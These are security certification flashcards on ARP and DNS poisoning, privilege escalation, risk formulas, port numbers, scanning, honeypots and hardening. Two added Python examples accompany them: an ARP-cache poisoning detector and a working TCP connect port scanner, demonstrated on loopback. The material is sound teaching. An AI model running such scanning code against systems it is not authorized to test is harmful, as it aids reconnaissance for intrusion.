What is ARP Poisoning?
Attacker sends forged ARP replies so that the victim's ARP cache maps an IP address (typically the default gateway's) to the attacker's MAC address, causing traffic for that IP to go to a different computer.
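As an added example (not from the flashcards), a Python check that compares an ARP-cache baseline with a later snapshot and reports the two signs of poisoning: an IP whose MAC changed, and one MAC answering for several IPs. Both tables are constructed text in a trimmed '<ip> <mac>' format.

```python
# Added example (not from the flashcards): spotting a poisoned ARP cache by comparing a
# baseline snapshot with the current one. The tables are constructed text in a trimmed
# '<ip> <mac>' format, like the two useful columns of 'arp -n' or 'ip neigh' output.
from collections import defaultdict

BASELINE_TABLE = """\
10.0.0.1    aa:bb:cc:00:00:01    gateway
10.0.0.23   de:ad:be:ef:00:23    workstation
10.0.0.40   00:11:22:33:44:40    printer
"""

# Constructed 'after' snapshot: the host at 10.0.0.23 has answered ARP for the gateway's
# IP, so 10.0.0.1 now maps to that host's MAC as well and gateway traffic flows through it.
POISONED_TABLE = """\
10.0.0.1    de:ad:be:ef:00:23
10.0.0.23   de:ad:be:ef:00:23
10.0.0.40   00:11:22:33:44:40
"""


def parse_arp_table(text):
    """Map ip -> lower-cased MAC, ignoring blank lines and trailing comment columns."""
    table = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0][0].isdigit():
            table[parts[0]] = parts[1].lower()
    return table


def arp_anomalies(baseline, current):
    """Two signals of poisoning: an IP whose MAC changed since the baseline, and one MAC
    claiming several IPs (the attacker keeps its own entry while stealing the gateway's)."""
    findings = []
    for ip, mac in current.items():
        if ip in baseline and baseline[ip] != mac:
            findings.append(f"{ip}: MAC changed {baseline[ip]} -> {mac}")
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return findings


if __name__ == "__main__":
    for finding in arp_anomalies(parse_arp_table(BASELINE_TABLE), parse_arp_table(POISONED_TABLE)):
        print(finding)
```

A changed MAC is not proof on its own (a replaced gateway NIC looks the same), so the check is a trigger for investigation; static ARP entries for the gateway, or dynamic ARP inspection on the switch, are the preventive controls.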
What is DNS poisoning?
- Domain Name System is current basis for name resolution to IP address.
- DNS poisoning substitutes false DNS records so that a name resolves to the attacker's address, redirecting the computer to another device.
What are the two locations for DNS poisoning?
- Local host table (the hosts file on the client)
- External DNS server
What is Privilege escalation? (attacks on access rights)
- Exploiting software vulnerability to gain access to restricted data.
- A lower-privilege user accesses functions restricted to higher-privilege users (vertical escalation).
- A user with restricted privileges accesses the different restricted privileges of a similar user (horizontal escalation).
What is Transitive Access? (attacks on access rights)
- Attack involving a third party to gain access rights.
- Has to do with whose credentials should be used when accessing services, different users have different access rights.
What is Vulnerability Appraisal?
- Determine current weaknesses; a snapshot of the organization's current security
- Every asset should be viewed in light of each threat
What is Single Loss Expectancy (SLE)?
- Expected monetary loss each time a risk occurs.
- Calculated by multiplying the Asset Value by Exposure Factor.
- EF- % of asset value likely to be destroyed by a particular risk
What is Annualized Loss Expectancy (ALE)?
- Expected monetary loss over a one-year period.
- Multiply the SLE by the annualized rate of occurrence (ARO).
- Annualized rate of occurrence - the expected number of times a particular risk will occur in a year (a probability when the event is expected less than once a year).
What are the Software Development Assessment techniques?
- Review architectural design in requirement phase.
- Conduct design reviews, consider including a security consultant.
- Conduct code review during implementation phase.
- Correct bugs during verification phase.
- Create and distribute security updates as necessary.
What do IP addresses do?
Uniquely identify each network device.
What is a Port Number and its length? What are the 3 types of port numbers?
- Unique identifier for applications and services.
- 16 bits in length.
- Well-known port numbers (0-1023) - reserved for the most universal applications
- Registered port numbers (1024-49151) - other applications not as widely used
- Dynamic and Private port numbers (49152-65535) - available for any application to use
What does Port Scanner software do?
Searches system for port vulnerabilities. Used to determine port state- open, closed, or blocked
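As an added example (not from the flashcards), the TCP connect scan a port scanner performs, in Python, with the three states inferred from socket behaviour. The demo opens a throwaway listener on loopback so the scan has a real open port to find, and finds a not-listening port to contrast it with.

```python
# Added example (not from the flashcards): the TCP connect scan behind a port scanner and how
# the three states on the card are inferred. The demo opens a throwaway listener on loopback.
import socket


def probe_port(host, port, timeout=0.5):
    """Classify one port: open (handshake completed), closed (RST came back: host up,
    nothing listening) or filtered (no reply before timeout: typically a firewall
    silently dropping the SYN)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:            # includes socket.timeout
        return "filtered"
    finally:
        sock.close()


def scan_ports(host, ports, timeout=0.5):
    return {port: probe_port(host, port, timeout) for port in ports}


def demo():
    """Bind a listener on an OS-chosen loopback port, find a port that is not listening,
    and scan both. Returns the results keyed by their role rather than by port number."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    # Reserve and release a second port so we know nothing listens on it right now.
    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()
    try:
        results = scan_ports("127.0.0.1", [open_port, closed_port])
        return {"listening": results[open_port], "not_listening": results[closed_port]}
    finally:
        listener.close()


if __name__ == "__main__":
    print(demo())
```

A connect scan completes the full handshake, so it shows up in the target's application logs; tools such as nmap default to a half-open (SYN) scan that sends a RST after the SYN-ACK to stay quieter, which needs raw sockets and therefore privileges. Only scan hosts you are authorized to test.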
What are Protocol Analyzers?
Hardware or software that captures packets to decode and analyze contents, a.k.a. Sniffers.
What are some common uses for protocol analyzers?
- Used by network administrators for troubleshooting.
- Characterizing network traffic.
- Security analysis.
What is the problem with assessment tools?
No standard for collecting, analyzing, reporting vulnerabilities.
What is OVAL?
- Open Vulnerability and Assessment Language.
- Designed to promote open and publicly available security content.
- Standardizes information transfer across different security tools and devices.
What is a Honeypot?
- Computer protected by minimal security.
- Intentionally configured with vulnerabilities.
- Goal- trick attackers into revealing their techniques.
What is a Honeynet?
Network set up with one or more honeypots.
Name differences between Vulnerability Scanning and Penetration Testing.
- Vulnerability Scanning: automated software searches a system for known security weaknesses.
- Creates report of potential exposures.
- Does not interfere with normal network operations.
- Penetration Testing: designed to exploit system weaknesses.
- Relies on tester's skill, knowledge, cunning.
- Usually conducted by independent contractor
- Conducted outside the security perimeter.
What is a Black Box, White Box, Gray Box Test?
- Black Box: tester has no prior knowledge of network infrastructure
- White Box: tester has in-depth knowledge of network and systems being tested
- Gray Box: some limited info has been provided to the tester
What is purpose of Hardening?
Eliminate as many security risks as possible.
What are system hardening techniques?
- Protecting accounts with passwords.
- Disabling unnecessary accounts.
- Disabling unnecessary services.
- Protecting management interfaces and applications.
What are standard techniques for mitigating and deterring attacks?
- Creating a security posture.
- Configuring controls.